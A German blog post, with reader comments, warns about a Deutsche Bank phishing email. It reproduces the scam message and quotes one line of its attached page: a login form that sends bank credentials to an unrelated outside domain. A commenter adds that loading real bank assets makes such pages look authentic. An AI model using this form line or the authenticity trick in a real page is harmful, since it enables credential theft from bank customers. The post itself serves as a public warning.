Deutsche Bank: Konto Aktivierungsupdate – ja genau Herr Phisher …

16 Januar 2012 3 Kommentare Autor: Jürgen (jdo)
Deutsche Bank Scam

Mit Logo ... Wow! Muss dann wohl echt sein ...

Was kann möglicherweise schief gehen, wenn man eine E-Mail mit folgendem Inhalt bekommt? In der elektronischen Nachricht befindet sich als Anhang eine index.html-Datei.

Spätestens wenn man aufgefordert wird, eine TAN via E-Mail zugesendetem Formular einzugeben, sollten alle Alarmglocken läuten.

Interessant an der index.html ist, dass Teile des Dokuments tatsächlich von meine.deutsche-bank.de nachgeladen werden. Sieht man sich aber an, wohin das Formular gehen soll … hier könnte der Spruch mit der Nachtigall stehen.

<form id=“loginForm“ method=“post“ action=“http://www.herediabienesraices.com.ar/images/go.php“>

nic.ar

nic.ar

Die Domäne herediabienesraices.com.ar scheint aber schon aus dem Verkehr gezogen zu sein. Unter nic.ar nachgesehen scheint sie registriert zu sein. Mein Spanisch ist leider nicht wirklich vorhanden aber die rote Schrift sagt wohl irgendwas von „unten“.

Also von solchen E-Mails nicht beeindrucken lassen und sofort in die digitale Tonne damit.

Liebe Deutsche Bank Kunden

Die Deutsche Bank ist nicht auf Ihrem Konto um zu ьberprьfen.

Ihr Konto muss so bald wie mцglich ьberprьft werden.

Sie kцnnen diese ьber den folgenden Download-Link tun.

Hinweis: Sie werden von unsererem Team der Deutschen Bank fьr weitere Informationen ьber dieses neue System kontaktiert werden.

Mit freundlichen GrьЯen

Kundendienst

Deutsche Bank

* Wichtig *

Aktualisieren Sie Ihre Unterlagen alle 48 Stunden.

© 2012 Deutsche Bank N. V. Deutschland. Alle Rechte vorbehalten.

Du kannst gerne Deinen Senf zu diesem Beitrag geben: Hier geht es zu den Kommentaren




Schreiben macht durstig! Eine kleine Erfrischung kann daher nie schaden. Wem dieser freie Artikel gefallen hat, der darf mir gerne einen frisch gezapften Hopfen-Tee ausgeben (Paypal - der Spenden-Knopf
oder bitcoin - Adresse: 1NacVNwcLLePUVv8uSafu5Ykdwh8QyDfgK). Ich freue mich über jede noch so kleine Spende. Vielen Dank und Prost!
 Alle Kommentare als Feed abonnieren

3 Kommentare zu “Deutsche Bank: Konto Aktivierungsupdate – ja genau Herr Phisher …”

  1. m3adow sagt:

    Das ist Professionalität auf HÖCHSTEM Niveau.

    Btw: Das Nachladen vom richtigen Server erhöht die Authenzität, da dann in der Statusleiste unten halt ab und an "Warte auf meine.deutsche-bank.de" o.ä. steht.

    • jdo sagt:

      sehr guter Hinweis! Danke ...

      ich kann es schwer glauben, dass Leute auf so etwas immer noch hereinfallen. Aber irgendwie muss es sich wohl rechnen ... wobei man genau genommen nur einen Deppen alle zwei Wochen finden muss ... von daher kann man nicht mehr machen, als immer wieder warnen und hinweisen ...

  2. Atalanttore sagt:

    Immer schön Mitmachen beim Eintragen von Fantasiedaten.

    Je mehr Leute ihre Falschinformationen an Phisher übermitteln, desto weniger wert wird deren Personendatenbank.

Antworten